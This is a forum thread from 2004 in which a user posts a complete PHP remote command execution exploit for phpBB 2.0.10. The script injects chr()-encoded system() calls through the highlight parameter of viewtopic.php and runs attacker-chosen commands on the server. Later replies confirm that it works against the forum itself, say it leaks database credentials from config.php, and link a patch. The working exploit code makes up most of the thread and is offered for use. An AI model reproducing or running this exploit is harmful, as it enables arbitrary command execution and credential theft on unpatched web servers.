# phpBB 2.0.10 execute command Exploits



## firewall (Nov 26, 2004)

Remote command execution exploit for phpBB 2.0.10 that makes use of a flaw in the viewtopic.php code. 


```
#!/usr/bin/php -q
<?php
/*
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark (*www.howdark.com) (1st October 2004)
#
# Requirement:
#
#    PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/

if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}

if ($argv[2]){
    $url = $argv[1];
    $command = $argv[2];
}
else {
    echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
    echo "\tURL\t URL to phpnBB site (ex: *127.0.0.1/html)\n";
    echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
    echo "\ttopic_id\t topic id\n";
    echo "\tproxy\t optional proxy url (ex: *10.10.10.10:8080)\n";
    exit;
}
if ($argv[3])
    $topic = $argv[3];
else
    $topic = 1;

if ($argv[4])
    $proxy = $argv[4];


$cmd = str2chr($command);

$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";       
$ch=curl_init();
if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;

function str2chr($str){

    for($i = 0;$i < strlen($str);$i++){
        $chr .= "chr(".ord($str{$i}).")";
        if ($i != strlen($str) -1)
             $chr .= "%252e";   
    }
    return $chr;
}
?>
```

--- Dont ask how to use it.....   ----


----------



## it_waaznt_me (Nov 26, 2004)

Ha Ha ha ...


----------



## go4inet (Nov 27, 2004)

lol @ you guys, when you run those exploits, you can see the dbname. dbadmin . dbhost from config.php file !

I dont think this is allowed heere ? Batty ?


----------



## flashweb (Nov 27, 2004)

Yes, the exploit is valid for this forum 

But here forum run as nobody. Still it will show content of php files, directory listing etc... If you run the forum as privilaged user (phpsuexe) anyone can hack the web site. It is very easy to patch this exploit

*www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513


----------



## go4inet (Nov 28, 2004)

I am waiting for digit forum to update with v2.0.11 ! Guess thats the latest version !


----------

